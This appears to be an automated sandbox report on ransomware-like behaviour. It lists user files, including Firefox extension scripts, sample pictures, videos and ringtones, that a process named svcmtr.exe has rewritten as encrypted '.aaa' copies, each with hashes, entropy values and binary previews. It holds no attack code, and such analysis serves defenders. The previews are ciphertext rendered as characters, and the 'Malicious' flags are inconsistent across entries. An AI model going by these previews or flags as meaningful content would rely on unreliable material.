                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..[..T2#u. ..mM.m3......j......?88].].N...d..8u8%....OO.....;...6..TQ..0...?4..E..-.6.....l9.|...."..}....$....u.C.._6^_...y..$..9\..w.A..I.+<......# G..a...f.....JD`.CK.A.K...+ct7.A.....h;..g....'[....<...U.O..z.Y(..iy...x.?IQb...R.`!{....QV.....t5;yI...i,..}.....!..!......Iel$....0...f......\..i.0...j..o.......B.ky.O......M..L...P....lz.....b...&....<\.....=.o.f..G.'.....5.v,X=...........5{...%$...t?..f1.M.s..k.F#lo.-....n:..T40O..........u.........$..-.>.......a..~@..s\.......6]{._jVw.%.,h..l..q.g..-.?y..):..i=n]}...$..ELc..Z...6.he..un....?:^.g.W..D_.N..).~.".....=L..E

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\tokens-manager.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1470
                                                                                                                          Entropy (8bit):7.652145716933632
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2S9kp1VwQ6P/u63t7amnWU96O5VL6aADTn8+zYaYiXRIMKID:c+9U40oDgB9kpS/RsmWU962kTTnj0aYU
                                                                                                                          MD5:6B925A5D3CD2C217CB1BD1153646A8D1
                                                                                                                          SHA1:4DDBD171B549C5447519FDA1321B715BC456F432
                                                                                                                          SHA-256:B9DB27FF938AD6C94096FBA4D7380A1EEC4824214D52C668DDF03E54FAFF28C4
                                                                                                                          SHA-512:90297ADAEB1DE8918A5F0452CD247E05CEC709543B3F05DCD5D6A23F871E5BF5D5CBF0DE97E12B6A11042AEE6466848759E5853F53ECD634EE07BEE2649B6512
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...........5..@........W.\d/...DJ>.....Z.~_..]tf/....X.;.S.e_^.p.%jN...kI..3Z......P.h..Z...A...w.....+U..y&.../.....o.c...7..:..^..PF}.{..*...h.......7.....]K.e.+LF@.....(...e9..........>9==z.,.".....3.B4%.g.....&b.. .h...]}s.O.j...'...S.U=.R..j.m[...PS5.H.)...Jun._l:...lQ......b.V`.C..;!PX._...yZ..@.,b8&.l...)[.'O....@..l......Z....2..d.`j.S?.c*...5...#.+.....6..g.f...Ky.]q..J..R@0#.]:#J.....$D..(..].A..w.Vw..4.F..#D.?K.Jw..08..8..<A...&m.).....Kg`x{..k...Q.uo.^..).j.A..6\.H.....;v..P...)...o.....{...7[(gk.+g.CPor...>P^/....f.[..&st..+........*`z.\...*.#.m.....HZ..%..vr....

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\toolbar-button.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3310
                                                                                                                          Entropy (8bit):7.902166789786186
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDZXPZq4AY5YfmWAHKI8Z7jnJGxfrt5QMNm1:Go9Q4T5vW8KzrJGFQMNi
                                                                                                                          MD5:CC7EBB14A12074EE97EF968D9EA3EB8A
                                                                                                                          SHA1:6A6CBBA5A902D6095777A6C5C7F03C5D7859EC75
                                                                                                                          SHA-256:E4EFECD5CDF34C89907407F97A69618363DCFF455764571E5F966A98DD69505A
                                                                                                                          SHA-512:8E4C314C425D5BA43DD020379581677C9401273C6678BEFB0619F368F4536A5A31AD9CFB8DE0F8731F5C09D763B90C33FD5CF22934D9C434E65E7199C6E8FDDA
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...47.(.}....7.W.G......YE.W..".M...w.5....{...6h. ....I.$}A.}s....i...d..Yw.U%.A.....H.aS..,..Pel...k1.H..p%......{..k...)...P.d...!..S.d..|..^.,5..F.F...8....u..q.B"..m.........#.....O8[%7.....f..-...j_.......,tfE...&.1N.Q.....e...\..zI=Z...-.......~[Co..D.x..E..P<..<......Y..Q.)......I..5.O...e.6@.......X...#G\X.(5i...X..I...........".rE....0$.7.L..-G........"....1.S.Q..s>Vh......p.K.T..j7N.....s.wK...Vf....*..UQ.S...~.P.`.d....'...N.u6.V..*/1....F...bt...(,.....W...+<.."..l...=.......|...C.....(G...l.F..$.%M...c.....9.v.....U`4....^I.bV-....D`..;....r7W.U.*l.F...

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\utils.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6926
                                                                                                                          Entropy (8bit):7.961489942903021
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoMqsyyjDjky1mvi87DbAumlPIQ04P9jbIwMR:GnyyPj9mDDpmRt9jb9s
                                                                                                                          MD5:81D4663E21BC9FE9FD3C6D7AA3089E19
                                                                                                                          SHA1:CDB4A73800E5CE68C25CE5E8D439DD338579CDF5
                                                                                                                          SHA-256:4DC47B5A1B74D5AC76A60012EBF7AA9554EB820DF253452C1406CD79E6374543
                                                                                                                          SHA-512:0D095DFE806C95226A87F5D0F2A9EE6A3D919E5AD7DA22227666A6CCDE37BADF288FDC730A8A42A1EA995022F8FCB6EA8D585A28E246E6F496F53D9B33E4C422
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..#,.......6..g..(`....SOL....I...V........,...k?kWR'..w....M.5....\..O...Z..jO...+.v\.G#.....17#.0j?-.O:<..\.......V :A.s.d.;.hs......*S:.......c.z..M...Y_..MJ..qY;E..K...J4...[.._..l...7o8b...C..\..3..........lc.Z..uP:...sc'<.8a.\L...j.:..ym7h....*8.;.._jo..>Zi...<.z;.EM..>w.Z5....,H.s.6...I.^.\...f.>i...H.Nc....z .@;....egJ./EW+......j.R...0..^.yi..p.(jS.....S.l0Z..&.XT.e@o..`..c.\..?#.K.9J\SU..."p...R]{qc..,.Kc.0...O.n......_o.[..<..K...#.].8\. W.....%..h..p..k..6 ]S'...8K.+s.E{N'`n'.v.....7.R.7....P.y..r..,cK5...=...l...7.. q...{..[.'6...1K........|...;).).c*D.A6....

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8942
                                                                                                                          Entropy (8bit):7.972373498955242
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoDWzKHDkyezOWRM2xoIckldMICkv3N3JU32dIJMKU7:GuRDk1z1RM2xoIvldMmv3vU2dI257
                                                                                                                          MD5:0F243A10FE034FCA9F71209F9924A182
                                                                                                                          SHA1:B04D0F2BC3B3E9989E4D4102BBD373CE3B687D1A
                                                                                                                          SHA-256:7219C0AE5D683599BDF3F30910D12C40F0E46ABA41D3262A0EA6C67915E314B1
                                                                                                                          SHA-512:84FF2B862F739D953AC7A40D049D80C251066FB42DC5A8EBFBE892FBBE87A246E029CD73AC2B3AE06B63E4FC15CF6FDC57F9D69C8D543721091C17D63030CF36
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..`.3y.....l-...C!...^..HN.....RgH.su.G.W_./...4M.J#Z&.r.....KB....l..hl..v.^..mx..Q.S/..-M`.>.C......W....F..@hK`hy-.e..=*.AG.`._.~.`......t...1.Y..F....LeA...T.2..W.6...j..v...br..._.".....O..Z"...6.j[^..y.~..!...Z1......W.'...q.....Y...73N.T..ea..@..,].s...+..\.....K...O.%G.|'j..'OV...'......J*GgV.Sd.5.R...._.xRgh`A.vkz*....lApCUw...J.......'%.b./F..s.......'..s..C.?>....2...].raU.4.?.(R.E...O.l...,....0...t..b..6p.9=m.....g.]Z.. ..,...\..!.~._...)'....J*p...7nSF.p.#3..La.Nh..V".....D...2k..g.N.6.U....j.Q....3..V!ni..a*t.z...}.....|C.m.1v....X..-....^4.F.......6I,.

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Desert.jpg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):846366
                                                                                                                          Entropy (8bit):7.999816925536536
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:24576:tVE53K42nu8FLFM/WyZdxqniAexD8OAvl6U0Y:oa434GlqniAe58OqL
                                                                                                                          MD5:984F5F4321D6FD7BC9419E24060D15A0
                                                                                                                          SHA1:62F2F6C3887CFBB2BAF3E98138C03E22C5C8622C
                                                                                                                          SHA-256:271C10D65657D042D0822C9530DE1D8489171C6EF33089024FC61B62AC5E8AC9
                                                                                                                          SHA-512:89C764D416E4A02840E155DD6913C4CF9F54C689D88E5C3253C4E3C2E8C1B8217CFE4DF59D80D0B8E946A3E8789727128B87498A69BA5CC111E5E82D3C7D4573
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...4o...x~.8.`....u.......&..HS......z.-Ek....y.....H*d.<..........=&.....[...........k.6....=..k*...9..<..Jn....DMl.=.!I9..Q...o.\..1SJ.....Zz..Le.....EC{.....`..O..XQp:..$..*.\......R..e..YIL8N .....(.,.M..{..*..t.&2.K.a.9.....G...Rr....k'....u.B....R.W..+LL.G..-......x..A.....Z5...t;s.y.3.C....URR.....L.]......G4.G./\.....[.......AP..Y........q.....a...K..F......X)R.Zn...........`./..7.....Fe....,....2\...".[.N..b.?..L!G,../.'....1........BI-B....].`....?.....o.i.......v".Ri....GZ*.2.YTz.l.c......0....;....=.......m...b..T..G.A..u...$6./....FF........er.s..q

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Koala.jpg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):781246
                                                                                                                          Entropy (8bit):7.999766644859161
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:jNioPVwKs/rnvjd5o41dPCAwkNNkQB7jXiuyMrnu87qRq96zULi3BmSu7isT6k7:5Vz4jduoKdqkQB75yib2I64Lywbv7
                                                                                                                          MD5:20E6A91B207ACECF2E0108AFF9D933F0
                                                                                                                          SHA1:2DDDE51695BEF1E15C579F760937266648F0186B
                                                                                                                          SHA-256:48E1EADCFFB8DDE517E10E8B9F7E741827638380B86F1D06F9BEA4D99588A1E8
                                                                                                                          SHA-512:F3757D5C530DE116197385BAD68F1F6EAF3031784F2DDE0CBB929AEEDBC68F14D1C13D7EF010A572D8892FF0F46CEDDAC1B5DC850DDC6145860ABFC17AEC392D
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...u....E..B..K.........5....u..2Y`....8_......~..}C_...V..P.e).....$v.R.q.@M......N.xbb~..!Vx.Z.d...p4.'/mMj...)..tw....*+.x....`.&F..Q."...:...S.M/[...b........W..s.S.E;....vu.U...A..R.y..Q..S.#..=.Vc.a..w.....e,59.r.YS%.2[M......*...+'.4s!..O..20.I.5.u$.r.._y..xE....^.x...NS...x.....-..j'..[a(....d>.....z.E.\.*...i........+N.y.4....T...........GOgt]......D.xu%.&+.6.x..A<.m........=.]...?b...n.&r....q.@..g.c.....4..1L..3}..."...Vq...o.I..Z.. [..#...........`..qf.A....,..9,....D...}..5.........r*.....&K..T.7......mM..*...x....%.z...ok.Geh...4..h.Yn..?%.I."d.V..m.$...fpR.'$

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Tulips.jpg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):621310
                                                                                                                          Entropy (8bit):7.999728563888484
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:pBEatWD9X+1PsYfxEwq02yCSBWttKkCQPA0jdNeWWSp:p+qsISyIttdy0JNUSp
                                                                                                                          MD5:03A547178ABC50C4502B8265B53DAFC1
                                                                                                                          SHA1:FCDDCD13F25F29C18712E6849DAC13E7EA97C05A
                                                                                                                          SHA-256:0756F3755A217D95D1EE71BE34C9EAB318FB0785F4A8E9E400E4F7573EC5D266
                                                                                                                          SHA-512:EF6B97AAE33B312A891B2ECDA0C54F7C2655F1329EED583194C0C9062889EAE2F9BF93BD6FAE31D64055AA6EE081223DB2ACB915316CFA2A524FAF7999C2ADC1
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...k+pw..P.y.[A.u.Xy....._2G..[y.P...M..rOS....J....U.^C...;.l..7.t..F...z...v>.T/..E...7..aj,I,-..?.s .V.np.O...>>.|..U.*...`.$]5....w....).M....}..j$..BI2..X...c..Y.m.$.i..e...#.G...=0....W..i.^..ndcQ2...........KOk.Bc...QlO.>..5o4..1..d...g.N...q.w.;6Jw.}...#..,..7..ri.8..]......P.u...IY..cp.E...8p....Qw].".sg....5.6v1F.;...1v.a.....+....:..).....2...x..]3F..<P..u..$...%+.Y..A....b.?.......;...r|.... SU....Q..X.` ..."?$ji...8.#.R.*].:...g..B.N.....(...p.g^1.v>GK{e.#...%X$.J-_..qY=$w....u.z.}..IFY...\.V..tR.Q.r.....Z........X.@L2|.[.g.A.>....=.@.O.o.e.cQ..

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Videos\Sample Videos\Wildlife.wmv.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26246446
                                                                                                                          Entropy (8bit):7.999993560462748
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:786432:U3PHUYS9v+iwKXDb6X1uAgSAtNulQGOiXGIiMR:U3PHU9v+CQuALAtNuMiX3R
                                                                                                                          MD5:ED25D6F9CE26EA23F803DA52D642EEE7
                                                                                                                          SHA1:AEBA4000CBD2867B788D95AB51342E23A7819B88
                                                                                                                          SHA-256:DD9925281A2E17409C59EECE3088A9D0934D51AA0D29B8F51939E6EE40024A4C
                                                                                                                          SHA-512:4F40B4E818B08254737F45CC9F370CCCDB8B3426DC1A7D629853B580921EBDBA85FE753F288E3F79323EE6ACD4A3D427C2E0B49DD5281962E8C3D6FFAD40D1E5
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....I...b.q.. Q..{...._..`...(@:.nk.G.K..o....>....*H.kH,.m.....V[.....3i'.+:.Eca.....A.j.G...Z=..eR..k/.F'd-.C.(.@I.,v...X...}p`.M..f0..8.+..g..j..........b<'dC9........|;9,>. ,.8.............D..&k.<..7uW.l.L..3...B.#L.N.M.........hg.. .....JZ.^...GJ..}..)....FA2k.q..4.)X..5.H^)..+B.>9..]g.7j.c.aI......wsC.]B2w.\..j^7...-...4....A..9...TC...;........-Vs.!..`.s..q.....^C0...w..g5.ztW...a@..'....oLb<i.jJ....{..7..G5 1.ka...DB..8...03E.o.w.}..h)LJPy8....`.=..~....)J.*...`.....W.po.........G-.....v...&8..4.u..l.h....H....... ...3.{Y...x.L3.'.....%...L,2...+^........Y.....Y.

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 01.wma.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):202254
                                                                                                                          Entropy (8bit):7.9990215591203775
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:6144:oCmUOmqEJHzNto4A4JrQpDjMW9BHln8azhxAd:3l9xzk4ArDDxR3hU
                                                                                                                          MD5:6EFE5544CF3FC43182281D4BF8DD2C07
                                                                                                                          SHA1:3D0CBA54D4496CF099B1E7528DC34CC3B70A51B5
                                                                                                                          SHA-256:8BEA187BD16E63483B2FA5BAA3FE611D6E1B2952CB403FCBBEE81C4D98E847EB
                                                                                                                          SHA-512:D57801ABA738C0A35A1C9BA4D52378FB51A4053EE014CEA0F864EF93F55399CAE2A4C62769A1DB4D7E9390C02846290EACAA7AA6A1449E19E15D641074038B63
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..)..e........m..i......r.;N...i....h..Y.0tm.9B....Y.......G...g.$..G........W..N.{j.......@....Z.u.k....rs#F..bT....8.6T%.YW...*[.RTP...{....@!1..5m..9.,....4..M?..$U......B.q...........d..H.......7..y.5.........w^.M>\.d.. ...../.A'.7...N.....j.?.smF..t..,V.-g-..U...v..`R..)......uW....-I..Nb.y,.y.$,.:Rh;.b.c.m.oGx..9.... .D?!2..'.%Fxc*.W.Q../j..%...{.T..\.%w/.H.........G.....q..`.4.z.xw."....A.a...S...T........Z.!l.6....].R..t`..{W..U'..Q.<............?$q".{TF. H1.....?..G.....~~..6...K..%..W.u~9[...m..9..C.P...R..S..N^[+..g..\........;{Cy.W.@......GU&..0..pP^./...&.3&1

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 02.wma.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):139614
                                                                                                                          Entropy (8bit):7.998657178117629
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:QoQ/7sILmdqUVlxF8DHVpzT9Vd52vcd/ML3mSDhq2P21bn:Qajl/8DHVpzT9xWcdkL3mCT2d
                                                                                                                          MD5:77B6E03D5C36ACD556628F1E6CA2E217
                                                                                                                          SHA1:C9C6353B85460FFE2F9B4431167C3FDC6E3DE5D2
                                                                                                                          SHA-256:210D4BC307E0B0D8A78F552E54A5FBA6142EA4ED6CE91375AFF8063288986628
                                                                                                                          SHA-512:F7C4EDB9A9744E33BE08F6C368FDFFDED21EA760E186661C8D1B602173172DC8FE0BB1BD61AE1921246E47556691DD06C080DE309369F24C707AFABCFFC6DFD1
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..8..`F..Ms....On....4mD...1.3...p...#...(..~..F.t....OL....Nk...PF_..}A27..Kz1..].X..U{.'....+3..e.1kt.tip......pM*......;%G"..r.....4l..\-'H.(sf..m...3n..Q..=.y.'..a.......L.A.......C.A'f]...v.A....P;1.d....O,.u.......{;jjb........W.2"...!....V%.>.:.Z.a. i...?.. ..G.+......~."..tN~.?T.rM..D?%......b=8.h.F..L.Q~.eM..al..:..4..^s.w..pjd...l......(|<..\.Pn.w...=..:......R.R.s`.k..~.m....z..G,.....IRt.C`..'<s.H.n.R.k;O./.v.....3...>E' ../.w.3..p}........O.7......Q....,S.}....6.G#IP~nC.Jj`7......*N...!.].&F.....^%...c.]........ow../.m.....I..._.;...w..<...:w.hN{.q..s...-..

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 03.wma.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.997962580304283
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:sm6Loj4bBllPXaPTHmRgMOgC47dJXCIXQiXougEABgx7T/yYmcz+kvfI:smUpbdXab6gMN7TCIXwugEcgx7TK4+ko
                                                                                                                          MD5:1DC74E633F81D13616F728732027F893
                                                                                                                          SHA1:0F113B850B56FA820908C1BB78F6D3AB670F124C
                                                                                                                          SHA-256:634B5C2DC25FAE3E653FA132A5CF36F63A8FDFD6216570CC2B22038890AAE6DD
                                                                                                                          SHA-512:8B4A6EC2FB4214C99AA41ECA263D03369F7A3FEF9C5DDE14CB1F00FE224F3950004BBEB3C4AF251858BB2C59A39362CADD19C6B50C2191CF6AE1CD8C79EB677E
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...z.{..G..dG..O..p..r...3.[...5x.......Q3....ZQ...f&.......|..]...5Rc...I.,.7v`,.]..fn....D.r1.x.;.4...|....F.0...q...fE.......m.../....S.l.|.b...!._.....I.......V-..` ..[N2`...0@.sR.y|wx_K.....s..[....PdK2.&.........>..T....M0..P..+.....~..k.p.v.....t.W.)..'.[.ZO.Hr^.U.6....^!.0W.9MT..D.lQ..{..q..U.u..%[.}..\d..v..kL.j-F.5.l.g..B...MR..:9.$.g.d.z..[..\..^Z.'N..A....$.u........_...=..D,:...es...!(7....=.Vk_.K..:Kz.g4.c..h.G...p{......jJ..W..^,....;..M....k.....0....=......cH...S.[.e(D...F..V..L..[....]Bp.W..xt..C....Qh3....&s....|B. .*.Of.x..R...q...ay,.H.U.wO..}..<I.....

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 04.wma.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):238046
                                                                                                                          Entropy (8bit):7.999182213002957
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:6144:2Zm/ctnx6ARQEOoIcKrYeIDEu2M2Y7jbmvnHcCN:2Y06KQEXID0/Dp2MZPm1N
                                                                                                                          MD5:E33D8BB35F8206E9FEC679DCE5198902
                                                                                                                          SHA1:699F290DA94D14749CF09EFB882C2C9B6C599781
                                                                                                                          SHA-256:2BF5FFDF6C849942093343835BB7A68865E0C9D299795C5C09B15A41FCB6FB7C
                                                                                                                          SHA-512:96315A191B805AB97B36DEA8A53E6B3B8F8A0BC1E86E7DF4CA054B7B4145620EFD7E0FB5E38337ABE4EDE41D67AE344FA85F7F0D21377C8A311D115613B99AB1
                                                                                                                          Malicious:true
